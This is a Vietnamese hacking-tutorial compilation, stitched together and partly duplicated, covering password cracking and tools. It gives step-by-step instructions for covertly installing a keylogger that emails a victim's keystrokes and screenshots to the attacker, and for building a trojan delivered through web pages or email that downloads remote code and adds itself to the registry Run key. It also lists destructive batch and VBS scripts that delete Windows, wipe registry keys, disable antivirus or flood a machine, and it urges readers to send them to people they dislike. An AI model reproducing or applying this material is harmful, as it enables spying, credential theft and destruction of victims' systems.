Crack Password
Content
5. Hacker lấy mật khẩu của bạn qua những phương pháp. - Xem bạn gõ mật khẩu - Tìm xem bạn có ghi mật khẩu của mình ra giấy hay không - Đoán mật khẩu dựa vào các số quen thuộc như: 123456, 654321… - Sử dụng phương thức tấn công Brute Force + Đây là phương thức tổng hợp các ký tự lần lượt để tấn tìm ra mật khẩu. - Sử dụng phương thức tấn công Dictionary Attack + Phương thức tấn công này tìm mật khẩu trong một bộ từ điển được sinh ra trước đó. - Cách tạo ra một mật khẩu khó: + Chẳng hạn mật khẩu của tôi ban đầu định đặt là: yeuemnhieu + Giờ tôi viết hoa chữ Y và chữ U thành: YeUemnhieU + Chữ E trong bảng chữ cái đứng vị chí 5 mật khẩu tôi thành: Y5U5mnhi5U + Chữ i tôi đổi thành ! mật khẩu thành Y5U5mnh!5U + Password của tôi đủ 10 ký tự có số, có hoa, có thường, có ký tự đặc biệt. 6. Xóa Password đã được lưu trong vWindows XP - Vào run gõ: Rundll32.exe Keymgr.dll, KRShowKeyMgr - Sẽ hiện ra bảng tương tự dưới đây và bạn hãy xóa hết những mật khẩu đã được lưu trong hệ thống.
7. Phá mật khẩu tổng quát - Về định nghĩa một Password Cracker là chương trình có thể giải mã được mật khẩu hay có thể vô hiệu hóa được mật khẩu. - Password Cracker có hai phương pháp chính đó là: Brute Force và Dictionary Attack, ngoài ra hiện nay mới có chương trình phá mật khẩu thông minh hơn hai kiểu cổ điển trên đó là phương thức tìm Password: Smart Table Recovery – đáp ứng tốc độ tìm mật khẩurất nhanh. - Password Cracker cũng có thể là một chương trình dùng để giải mã những mật khẩu đã được mã hóa, ví như các mật khẩu được lưu trong IE, Firefox,… 8. Mục tiêu của các chương trình tìm mật khẩu. - Trên hệ thống Windows và Linux có hai tài khoản toàn quyền trong hệ thống đó là: root và Administrator, và mục tiêu tấn công là tìm được password của hai tài khoản đó - Khi tìm được Password của tài khoản có quyền quản trị kẻ tấn công sẽ toàn quyền với máy đích. - Kẻ tấn công cũng có thể dùng các phần mềm Sniffer để tóm các gói tin Username Password được truyền đi trong hệ thống mạng. - Và ảnh hưởng của việc bị chiếm mất quyền quản trị tùy thuộc hoàn toàn vào dữ liệu và các ứng dụng trong hệt hống. 9. Chương trình Password Cracker hoạt động như thế nào
- Để hiểu được một Password Cracker làm việc như thế nào chúng ta cần phải hiểu được các chương trình quản lý Password thực hiện ra sao. Hầu hết các chương trình quản lý Password đều mã hóa Password theo một phương thức nào đó. - Mật khẩu sau khi được tạo ra và lưu vào trong hệ thống sẽ được mã hóa, hệ thống sẽ chứa Key để giải mã mật khẩu. - Những phần mềm Password Cracker sẽ tìm cách lấy được các đoạn mật mã đó. -Sau khi đã lấy được các đoạn mật mã trên máy của nạn nhân chúng sẽ tiến hành giải mã mật khẩu bằng những phương thức cụ thể cho từng tình huống. 10. Các dạng Password Cracker - Dictionary Attack: Tìm mật khẩu trong một file từ điển tạo sẵn - Brute Force Attack: Tìm mật khẩu bằng cách tổ hợp các ký tự - Hybird Attack: Lai giữa hai phương thức trên - Smart Table Recovery Attack: Phương thức tấn công tìm mật khẩu thông minh nhất dựa trên các bảng dữ liệu – Khoảng 700MB dữ liệu text. 11. Tìm Password bằng phương thức đơn giản - Đoán mật khẩu - Thay thế đoạn URL 12. Tìm Password bằng giải mã Cookies - Với chương trình CT cookie Spy 2.0 - Cookies thương lưu lại rất nhiều thông tin quan trọng của người dùng khi truy cập vào Internet như Username và Password truy cập vào một Website. - Với phần mềm này bạn có thể tìm kiếm các Cookies được lưu dữ trong hệ thống và giải mã chúng để tìm Username Password.
13. Tấn công Dictionary Attack. - Tạo từ điển dùng phần mềm: Dictionary Maker
14. Danh sách các Tools Password Crackers -Lophtcrack – WebCracker
- John The Ripper – Munga Bunga - Brutus – ReadCookies - Obiwan – SnadBoy - Authforce – WinSSLMiM - Hydra – RAR - Cain & Abel Gammaprog Hầu hết các tools này đều miễn phí và nếu có phí thì hoàn toàn crack được một cách dễ dàng Hầu hết chúng đều có khả năng sử dụng tất cả các loại tấn công trên, đều có thể Export Username Password từ một hệ thống Local hay Remote. - Theo kinh nghiệm của tôi hay dùng đó là: Cain & Abel tuy nhiên phần mềm này mạnh về giải mã và Sniffer hơn. Lophcrack có lẽ crack khá nhanh bất kỳ password nào dài dưới 10 ký tự máy tính của tôi chỉ cần khoảng hơn 1 giờ là có thể giải mã được. - John the Ripper đây là phần mềm chuyên phá mật khẩu trong môi trường Unix và sử dụng mã hóa DES, Extend DES, MD5 cũng tích hợp nhiều phương pháp giải mã. - Brutus là một chương trình Online hay Remote Password Cracker. Tấn công tới một hệ thống như máy chủ IIS, Windows, Modem ADSL…. Chúng thử lần lượt Username và Password nhất định để tấn công vào máy chủ - Obiwan khắc phục nhược điểm của Brutus là có độ trễ khi sử dụng Username Password sai. - Authforce dựa vào HTTP Basic Authentication hỗ trợ việc thử Username Password tới một site nhất định - MessenPass có thể giải nén được hầu hết các tài khoản chát như Yahoo, MSN…
Lưu ý từ phiên bản YM 7 password không bao giờ được lưu ở máy Local lên phần mềm này không crack được. - Wireless WEP Key Password Spy đây là một tools hỗ trợ giải mã để truy cập vào một hệ thống mạng vWireless đặt mật khẩu. Theo Vnexperts Research Department assware Kit Enterprise săn tìm password của các ứng dụng thường gặp như: Excel, Word, WinZip, Windows XP/2000/NT, Access, Outlook, Quicken, WordPerfect, VBA, 1-2-3, ACT!, Paradox, Organizer, Schedule, WordPro… Passware Kit còn có các tính năng săn được password của 6 ứng dụng khác là SQL, BestCrypt, Network Connections, MYOB 2005, Quicken 2006 và FileMaker 8. Chương trình cho phép bạn lấy lại password của các định dạng tập tin (Recover File Password…), những ứng dụng liên quan đến hệ thống mạng (Recover Internet and Netwword Password, Windows Reset Windows Administrator Password…). Bạn tùy chọn thứ cần lấy lại password trong thanh File. Ngoài ra, ở thanh này còn có tùy chọn Search for Protected File… để tìm quét các tập tin đã bị khóa. Recover File Password: Phục hồi password cho các tập tin
Chức này này giúp bạn phục hồi hầu như tất cả định dạng tập tin đang có hiện nay, như: Word (d*.doc, *.docx), Exel (*.xls, *.xlsx), Powerpoint (*.ppt, *.pptx), WinRAR (*.rar), WinZip (*.zip), *.pdf,…
Đầu tiên, bạn vào File > chọn Recover File Password (Ctrl + O), rồi tìm tập tin bị khóa cần lấy lại password. Sau đó, nhấn vào Run Wizard để mở thuật sỹ tra password. Tại đó, chọn I know not thing about the password (nếu chưa biết bất cứ thông tin gì về password cần tìm), rồi nhấn Finish để chương trình tìm kiếm. Hoặc dùng các tùy chọn còn lại (nếu bạn có chút thông tin nào đó và muốn cung cấp để thêm căn cứ cho chương trình truy tìm password), rồi nhấn Next và tiến hành cung cấp.
Recover Internet and Netword Password: Phục hồi password cho các ứng dụng liên quan hệ thống mạng Bạn cũng chọn bằng cách vào thanh File, rồi chọn tiếp ứng dụng chứa tài khoản cần lấy lại password. Ngay lập tức, chương trình sẽ chạy để đưa ra kết quả.
Đó là hai chức năng thường dùng của PRE, ngoài ra còn có các tính năng hay khác đang chờ bạn khám phá! Lưu ý:
Tốc độ truy lùng password nhanh hay chậm phụ thuộc vào số ký tự và các ký tự đó như thế nào. Nếu số ký tự ít và không chứa các ký tự đặc biệt (như: @, #,…) thì tốc độ sẽ nhanh hơn, và ngược lại.
Download Passware Kit Enterprise 9.5 - săn tìm password của các ứng dụng
Note: - Chúng tôi không cung cấp các các phần mềm Crack. Không phổ biến các bạn sử dụng các phần mềm bẻ khóa. Mọi trách nhiệm còn lại là của bạn khi sử dụng phần mềm này. - Các phần mềm cung cấp trên Website là do các thành viên đóng góp, submit. Nếu bạn nhận thấy những phần mềm nào không hữu dụng, hoặc chứa mã độc xin hãy thông báo cho BQT website biết để sớm giải quyết. - Để an toan, máy tính của bạn cần trang bị các phần mềm tìm, diệt virus - trojan và các phần mềm xấu khác trước khi tải các phần mềm trên Internet.
Từ khóa phần mềm Passware Kit Enterprise 9.5 - săn tìm password của các ứng dụng thường được tìm thấy
Passware Kit Enterprise 9.5 - săn tìm password của các ứng dụng Tai phan mem Cách 1 : dùng keylog cài trực tiếp vào máy hay nhất là dùng perfectkeylogger của công ty blazingtools down ở đây http://www.freewebtown.com/quang031/i_bpk2003.exe hướng dẫn đây 1Dầu tiên là cài đặt a)Bạn cilck vào file exe để setup b)khi set up máy sẽ hoi bạn đặt tên file là gì theo tôi bạn cứ đặt tên là Readme(tý nữa tui sẽ giải thích nguyên nhân sau).Bạn đien thông số sau ========================
username : pvthanh serial : WEJJ-XVJP-QVPI-CSRP )View the log:Cho bạn xem các tháo tác bạn đã sữ dụng trên bàn phím 2)Hide progam icon:cho phep bạn chon ẩn hay hiện icon trên taskbar 3)password:đặt password cho chương trình ,khi nhập đúng password thì mới có quyền sử dụng chương trình 4)Exit thoát khỏi chương trình chú ý nó sẽ không theo dõi bàn phím nữa nếu như bạn bấm exit Còn lại là hai chức năng cực kỳ quan trong b)logging:gồm các chức năng sau password:như trên viewlog:như trên clearlog:giúp làm sạch các ghi chép trên bàn phím of c/t c)Screenshots Chụp ảnh màm hình.Bạn có thể điỿu chỉnh thỿi gian chụp anh 1 lần còn nếu không muốn thì bạn không chọn ô Enable visual..... d)email:cực kỳ quan trọng schedule:chon thoi gian gửi một lần(,Try to send logs by email every.. thoi gian được tính từ khi victim online) loại file, dung lượng gửi(đến chừng bao nhiêu KB sẽ gửi 1 lần log size ) sendto:địa chỉ mail của bạn vd: [email protected] SMTP server của gmail gsmtp183.google.com còn của yahoo thì mình không nhớ post number:giử nguyên username:tên hộp mail của bạn vd RUOIBU passwordassword hộp mail của bạn auto..:chọn none Xong xuôi rùi bạn hảy click vào sendtest nếu báo là thành công thì ok rùi đó Tới phần FTP: cái này dùng để upload lên web,cũng rất hay vì có 1 số phần mỿm chống các chươnmg trình có chức năng gửi mail(BKAV...) nên dùng cái này có vẽ hay Hostname:tên host vd:ftp.vandon.homeip.net ( của tui) => nhưng nói thất bỿn này dùng thưỿng kô được mấy ( mặ dù đã text được qua kinh nghiệm hi ) username:tên sử dụng password: xxxxx Alert: phần này có chức năng gửi mail cho bạn ngay lập tức khi nó "tìm thấy những từ hay cụm từ mà bạn qui định ở dưới (bạn có thể Add keyword tùy ý) khi Victim typing trên máy của victim . Phần ở dưới là 2 lựa chon : Send email notification (bắt buộc chọn nếu bạn muốn program gửi mail cho bạn) và Make a screenshot (chụp hình monitor của victim , chon hay ko tùy bạn) . Nhưng có 1 lưu ý nho nho , bạn nên add keyword dài dài hay keyword mà bạn nghi là victim có thể đánh (như trong phần password,hay chat với ai đó chẳng hạn) ,
B)Remote install ( tạo ra con trojan cực tuyệt) có ai muốn thử kô trojan đó => bay gio xong roi do ban upload nen mang thoi co gi ko hieu nhan lai cho toi rùi và bây giờ là kết quả nè Cách 2 : tạo trojan để hack nghĩa là các bạn tạo ra 1 con tương tự như virus , bạn đem phát tán lên mạng ...như mấy thằng đểu nó hay gửi lên các diễn đàn để lừa gà đó Khi đả điền đầy đủ các thông tin ở phần Options xong bạn vào mục Remote Installation.... để tạo con trojan --> Next --> Next-->Browse bọn chọn 1 file nào đó cỏ thể la file .exe hoặc file ảnh ....Tiếp đó bạn chọn Next Finish .. khi nào tạo xong file nhiệm trojan thì up lên 1cái host free nào đó CÁC BẠN HÃY ĐỌC KỸ PHẦN HƯỚNG DẪN BÊN TRÊN Con Trojan mà các bạn tạo ra có thệ chụp ảnh màn hình ,, Kể cả bàn phím ảo của võ lâm .. mình đả thử nghiệm và rất thành công chính acc của mình ... chúc các bạn thầnh công!!!! Bạn muốn chạy tự động 1 trojan trên máy tính người khác khi họ xem trang Web hoặc Email của bạn...! Có cách nào không??? Dĩ nhiên là được rồi! Bài viết này sẽ giúp bạn giải quyết vấn đề! 1) Hướng dẫn: · Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb. Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.com hoặc tự viết một file trojan.exe để xài! · Bước 2: chạy convert16.exe để convert file trojan.exe sang trojan.hex · Bước 3: dùng 1 trình soạn thảo văn bản dạng text( nên dùng EditPlus, nó rất hay!) để sửa file temp.htm như sau: Thay phần .doc=”4D5A900... 64620000” thành .doc=”<đặt nội dung của file trojan.hex vào đây>” VD: .doc=”9631447da55abcd44ac25...” · Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác!
2) Mã nguồn:
· Files: § tempsrc.hta dùng để extract và execute trojan.exe § tempsrc.htm file htm chính § convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex
· Những vấn đề chính:
§ Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe Chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau:
Kí tự L P T V C l u b 2 0 0 1 Mã ANSI ở hệ 10 76 80 84 86
32 67 108 117 98 32 50 48 48 49 Mã ANSI ở hệ 16 4C 50 54 56 20 43 6C 75 62 20 32 30 30 31
Encode16 Decode16 “LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001”
‘--- VBScript Code ---
function encode16(st) for i = 1 to len(st) temp = hex((asc(mid(st,i,1)))
‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i ‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này ‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ... temp =”0” & temp end if encode16 = encode16 & temp next end function
function decode16(st) for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2 decode16 = decode16 & chr(“&h” & mid(st,i,2)) ‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi ‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16 next end function ‘--- VBScript Code ---
§ Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm
ü Mục đích:
+ giảm kích thước file + làm cho mã lệnh khó đọc đối với người khác
ü Ví dụ: thay vì viết lệnh rõ ràng:
on error resume next dn=chr(34) xd=vbcrlf set wsh=createobject("wscript.shell") set fso=createobject("scripting.filesystemobject")
Chúng ta cũng có thể viết lại như sau:
on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject")
Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không?
3) Hỏi/Đáp:
· Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không?
Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầu như đều là các file .exe chương trình có khả năng tự thực thi nên bạn hoàn toàn có thể thay đổi theo ý muốn của bạn!
· Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớn kinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ?
· Tôi muốn máy họ tự động download file trojan.exe từ trên mạng về và execute nó? Có được không?
Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe! ... wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan ...
Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip
· Có thể chạy trojan.exe ngay sau khi người khác đọc trang Web hoặc Email mà không cần họ khởi động lại máy tính không?
Hoàn toàn có thể được! Nhưng trong phạm vi bài viết này, tôi không muốn đề cập đến!
Chúc các bạn thành công! Đầu tiên, bạn hãy thử 1 chút mẹo vặt này để hỉu rõ hơn về con virus mà bạn sắp sửa tạo:
Thông thường khi muốn xóa hẳn 1 file nào đó mà không thể cứu lại thì các bạn phải nhờ đến các soft chuyên dùng để xóa File ( như Blannco Shreader, Unlocker......), tuy nhiên trong Win bạn vẫn có thể xóa hẳn file bằng cách tạo 1 tập tin .cmd Bạn hãy mở notepad, paste đoạn code này vào Trích dẫn:DEL /F /Q * , sau đó lưu lại với bất cứ tên nào bạn muốn ở định dạng .cmd. Với file cmd này khi kích hoạt nó sẽ xóa sạch tất cả các file có trong máy tính cho dù đó là file read only hay là bạn ko có quyền tiếp cận nó. Bạn sẽ ko bít được hậu quả của nó ra sao nếu bạn ko kích hoạt nó. Cảnh báo: Đừng kích hoạt nó!!! Bạn hãy làm 1 ví dụ nhỏ để thấy tác dụng của nó: hãy tạo 1 file bất kỳ trong bất kỳ thư mục nào đó ( ở đây xin ví dụ tạo file C:\test.txt ). Mở notepad, paste đoạn code Trích dẫn:erase C:\TEST.txt vào, lưu lại dưới dạng file .cmd với bất cứ tên nào. Ok bây giờ bạn kích hoạt nó, bạn sẽ thấy trong ổ C:\ sẽ ko còn file test.txt. Đến đây chắc bạn đã vỡ lẽ ra nhìu điều, và bây giờ là công việc chính --> tạo 1 con virus phá hoại: Hãy mở Notepad, past đoạn code Trích dẫn:erase C:\WINDOWS hoặc C:\LINUS nếu là HDH Linus lưu lại ở định dạng .cmd với 1 cái tên hấp dẫn nào đó ( anhyeuem, emyeuanh,love,readme......) Vô cùng cảnh báo bạn đừng kích hoạt nó trong máy tính của ban!!! Bạn hãy gửi cho người nào mà bạn ghét nhất, khi người đó kích hoạt nó.......oops ,xin hãy vui lòng cài lại máy!!! Và đó gọi là virus, 1 con virus đơn giản nhưng hậu quả của nó thì không đơn giản chút nào. Một lần nữa mình mong các bạn coi đây là 1 kinh nghiệm để mà tránh chứ đừng áp dụng nó nhe!!! P/s: Các bạn có thể tạo 1 file .cmd với cách như trên nhưng với đoạn code Trích dẫn:ATTRIB +S /F /Q * để ẩn toàn bộ các file trong Win, ko ai có thể tiếp cận máy tính của bạn trừ khi thiết lập lại cài đặt.
cách làm nhưng file virus đơn giản
Đầu tiên các bạn mở notepad và chọn một trong những đoạn mã sau, các bạn copy đoạn mã vào notepad và lưu dưới đuôi VBS(nếu ko dc thì lưu với đuôi . cmd). ví dụ: slm.vbs
chảng hạn.. * mở ra một thông điệp vui sau đó sẽ tắt máy tính CODE Code: @echo off msg * em la slm ,bb anh! shutdown -c "virus slm" -s -t 10 Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi: Dưới đây là code của một số con virus nhỏ dưới dạng VBS: 1.Không cho victim khởi động máy: Code: Code: Dim wsh Set wsh = createobject("wscript.shell") wsh.run "RUNDLL32.EXE user.exe,exitwindows" 2. Disable NAV: Code: Code: Dim wsh Set wsh= CreateObject( "WScript.Shell") s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\Norton Program Scheduler\Start" wsh.RegWrite s1,3, "REG_DWORD" 3. Hiển thị một message mỗi khi reboot máy: Code: Code: dim wsh Set wsh = CreateObject( "WScript.Shell" ) s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win Logon\" s2 = "LegalNoticeCaption" s3 = "LegalNoticeText" wsh.RegWrite s1+s2, "http://allformy.topcities.com" wsh.RegWrite s1+s3, "Hi ! Toi la SLM"
4. Hiển thị một dòng lệnh khi click vào file hay folder:, Code: Code: set reg=createobject("WScript.shell") reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK " reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK \","SLM" 5. Làm cho các trò trên hoạt động bình thường: Code: Code: Dim objShell Set objShell = CreateObject( "WScript.Shell" ) s1 = "HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion\ " s2 = "Policies\System\DisableRegistryTools" objShell.RegWrite s1+s2,1, "REG_DWORD" Dưới dạng Javascipt : Code: Code: var wsh; wsh=new ActiveXObject ("Wscript.shell"); // Winlogon when reboot var s1 = " HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\WinLogon\\"; var s2 = "LegalNoticeCaption"; var s3 = "LegalNoticeText"; wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ; wsh.RegWrite (s1+s3, "Hi ! Toi la Love. Toi den tu Chip&Kitty.com") ; //Disable Registry var s1 = "HKEY_USERS\\. Default\\Software\\Microsoft\\Windows\\CurrentVers ion\\"; var s2 = "Policies\\System\\DisableRegistryTools" ; wsh.RegWrite (s1+s2,0,"REG_DWORD");
//Delete file Msconfig.exe Code: Code: var fso; fso=new ActiveXObject("Scripting.FileSystemObject"); var fe=fso.getfile("C:\\windows\\msconfig.exe); fe.delete true; //Shutdown windows //Disable Mouse wsh.run ("RUNDLL32.EXE mouse,disable"); //Hang up windows wsh.run ("rundll32 user,disableoemlayer"); Xóa khóa Registry Files * xóa các tập tin registry key, sau đó lặp lại một tin nhắn CODE Code: @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO slm chuc anh 1 ngay vui ve. GOTO MESSAGE -Endless Notepads * Điều này sẽ bật lên Notepads bất tận cho đến khi máy tính bị đóng băng và các vụ đụng *
CODE Code: @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
-Crazy caps lock * không ngừng quay caps lock và tắt nhanh chóng liên tục * CODE Code: Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop --Endless ENter * Ép enter liên tục CODE Code: Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop --Endless Backspace * làm cho phím backspace liên tục bị ép * CODE Code: MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop * làm cho ổ đĩa CD liên tục vọt ra * CODE Code: Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop Tất cả các code trên lưu với đuôi VBS Còn những cái này lưu dưới dạng slm.bat(đuôi .bat) Lặp lại n lần chu kỳ mess Code: @ECHO off :Begin msg * Hi msg * khoe ko anh ? msg * em slm ne msg * buon ngu chua? msg * tat may ngu thoi ,bb anh GOTO BEGIN Auto shutdown Code: @echo off msg * slm yeu anh shutdown -c “Error! tạm biet anh!” -s còn cái này thì ác hơn nửa Start > Run > Notepad Mở notepad, paste đoạn code Trích dẫn:erase C:\TEST.txt vào, lưu lại dưới dạng file .cmd với bất cứ tên nào. Ok bây giờ bạn kích hoạt nó, bạn sẽ thấy trong ổ C:\ sẽ ko còn file test.txt. Đến đây chắc bạn đã vỡ lẽ ra nhìu điều, và bây giờ là công việc chính --> tạo 1 con virus phá hoại: Hãy mở Notepad, past đoạn code Trích dẫn:erase C:\WINDOWS hoặc C:\LINUS nếu là HDH Linus
lưu lại ở định dạng .cmd với 1 cái tên hấp dẫn nào đó ( anhyeuem, emyeuanh,love,readme......) Vô cùng cảnh báo bạn đừng kích hoạt nó trong máy tính của ban!!! Bạn hãy gửi cho người nào mà bạn ghét nhất, khi người đó kích hoạt nó.......oops ,xin hãy vui lòng cài lại máy!!! Và đó gọi là virus, 1 con virus đơn giản nhưng hậu quả của nó thì không đơn giản chút nào. Một lần nữa mình mong các bạn coi đây là 1 kinh nghiệm để mà tránh chứ đừng áp dụng nó nhe!!! P/s: Các bạn có thể tạo 1 file .cmd với cách như trên nhưng với đoạn code Trích dẫn:ATTRIB +S /F /Q * Để ẩn toàn bộ các file trong Win, ko ai có thể tiếp cận máy tính của bạn trừ khi thiết lập lại cài đặt.
7. Phá mật khẩu tổng quát - Về định nghĩa một Password Cracker là chương trình có thể giải mã được mật khẩu hay có thể vô hiệu hóa được mật khẩu. - Password Cracker có hai phương pháp chính đó là: Brute Force và Dictionary Attack, ngoài ra hiện nay mới có chương trình phá mật khẩu thông minh hơn hai kiểu cổ điển trên đó là phương thức tìm Password: Smart Table Recovery – đáp ứng tốc độ tìm mật khẩurất nhanh. - Password Cracker cũng có thể là một chương trình dùng để giải mã những mật khẩu đã được mã hóa, ví như các mật khẩu được lưu trong IE, Firefox,… 8. Mục tiêu của các chương trình tìm mật khẩu. - Trên hệ thống Windows và Linux có hai tài khoản toàn quyền trong hệ thống đó là: root và Administrator, và mục tiêu tấn công là tìm được password của hai tài khoản đó - Khi tìm được Password của tài khoản có quyền quản trị kẻ tấn công sẽ toàn quyền với máy đích. - Kẻ tấn công cũng có thể dùng các phần mềm Sniffer để tóm các gói tin Username Password được truyền đi trong hệ thống mạng. - Và ảnh hưởng của việc bị chiếm mất quyền quản trị tùy thuộc hoàn toàn vào dữ liệu và các ứng dụng trong hệt hống. 9. Chương trình Password Cracker hoạt động như thế nào
- Để hiểu được một Password Cracker làm việc như thế nào chúng ta cần phải hiểu được các chương trình quản lý Password thực hiện ra sao. Hầu hết các chương trình quản lý Password đều mã hóa Password theo một phương thức nào đó. - Mật khẩu sau khi được tạo ra và lưu vào trong hệ thống sẽ được mã hóa, hệ thống sẽ chứa Key để giải mã mật khẩu. - Những phần mềm Password Cracker sẽ tìm cách lấy được các đoạn mật mã đó. -Sau khi đã lấy được các đoạn mật mã trên máy của nạn nhân chúng sẽ tiến hành giải mã mật khẩu bằng những phương thức cụ thể cho từng tình huống. 10. Các dạng Password Cracker - Dictionary Attack: Tìm mật khẩu trong một file từ điển tạo sẵn - Brute Force Attack: Tìm mật khẩu bằng cách tổ hợp các ký tự - Hybird Attack: Lai giữa hai phương thức trên - Smart Table Recovery Attack: Phương thức tấn công tìm mật khẩu thông minh nhất dựa trên các bảng dữ liệu – Khoảng 700MB dữ liệu text. 11. Tìm Password bằng phương thức đơn giản - Đoán mật khẩu - Thay thế đoạn URL 12. Tìm Password bằng giải mã Cookies - Với chương trình CT cookie Spy 2.0 - Cookies thương lưu lại rất nhiều thông tin quan trọng của người dùng khi truy cập vào Internet như Username và Password truy cập vào một Website. - Với phần mềm này bạn có thể tìm kiếm các Cookies được lưu dữ trong hệ thống và giải mã chúng để tìm Username Password.
13. Tấn công Dictionary Attack. - Tạo từ điển dùng phần mềm: Dictionary Maker
14. Danh sách các Tools Password Crackers -Lophtcrack – WebCracker
- John The Ripper – Munga Bunga - Brutus – ReadCookies - Obiwan – SnadBoy - Authforce – WinSSLMiM - Hydra – RAR - Cain & Abel Gammaprog Hầu hết các tools này đều miễn phí và nếu có phí thì hoàn toàn crack được một cách dễ dàng Hầu hết chúng đều có khả năng sử dụng tất cả các loại tấn công trên, đều có thể Export Username Password từ một hệ thống Local hay Remote. - Theo kinh nghiệm của tôi hay dùng đó là: Cain & Abel tuy nhiên phần mềm này mạnh về giải mã và Sniffer hơn. Lophcrack có lẽ crack khá nhanh bất kỳ password nào dài dưới 10 ký tự máy tính của tôi chỉ cần khoảng hơn 1 giờ là có thể giải mã được. - John the Ripper đây là phần mềm chuyên phá mật khẩu trong môi trường Unix và sử dụng mã hóa DES, Extend DES, MD5 cũng tích hợp nhiều phương pháp giải mã. - Brutus là một chương trình Online hay Remote Password Cracker. Tấn công tới một hệ thống như máy chủ IIS, Windows, Modem ADSL…. Chúng thử lần lượt Username và Password nhất định để tấn công vào máy chủ - Obiwan khắc phục nhược điểm của Brutus là có độ trễ khi sử dụng Username Password sai. - Authforce dựa vào HTTP Basic Authentication hỗ trợ việc thử Username Password tới một site nhất định - MessenPass có thể giải nén được hầu hết các tài khoản chát như Yahoo, MSN…
Lưu ý từ phiên bản YM 7 password không bao giờ được lưu ở máy Local lên phần mềm này không crack được. - Wireless WEP Key Password Spy đây là một tools hỗ trợ giải mã để truy cập vào một hệ thống mạng vWireless đặt mật khẩu. Theo Vnexperts Research Department assware Kit Enterprise săn tìm password của các ứng dụng thường gặp như: Excel, Word, WinZip, Windows XP/2000/NT, Access, Outlook, Quicken, WordPerfect, VBA, 1-2-3, ACT!, Paradox, Organizer, Schedule, WordPro… Passware Kit còn có các tính năng săn được password của 6 ứng dụng khác là SQL, BestCrypt, Network Connections, MYOB 2005, Quicken 2006 và FileMaker 8. Chương trình cho phép bạn lấy lại password của các định dạng tập tin (Recover File Password…), những ứng dụng liên quan đến hệ thống mạng (Recover Internet and Netwword Password, Windows Reset Windows Administrator Password…). Bạn tùy chọn thứ cần lấy lại password trong thanh File. Ngoài ra, ở thanh này còn có tùy chọn Search for Protected File… để tìm quét các tập tin đã bị khóa. Recover File Password: Phục hồi password cho các tập tin
Chức này này giúp bạn phục hồi hầu như tất cả định dạng tập tin đang có hiện nay, như: Word (d*.doc, *.docx), Exel (*.xls, *.xlsx), Powerpoint (*.ppt, *.pptx), WinRAR (*.rar), WinZip (*.zip), *.pdf,…
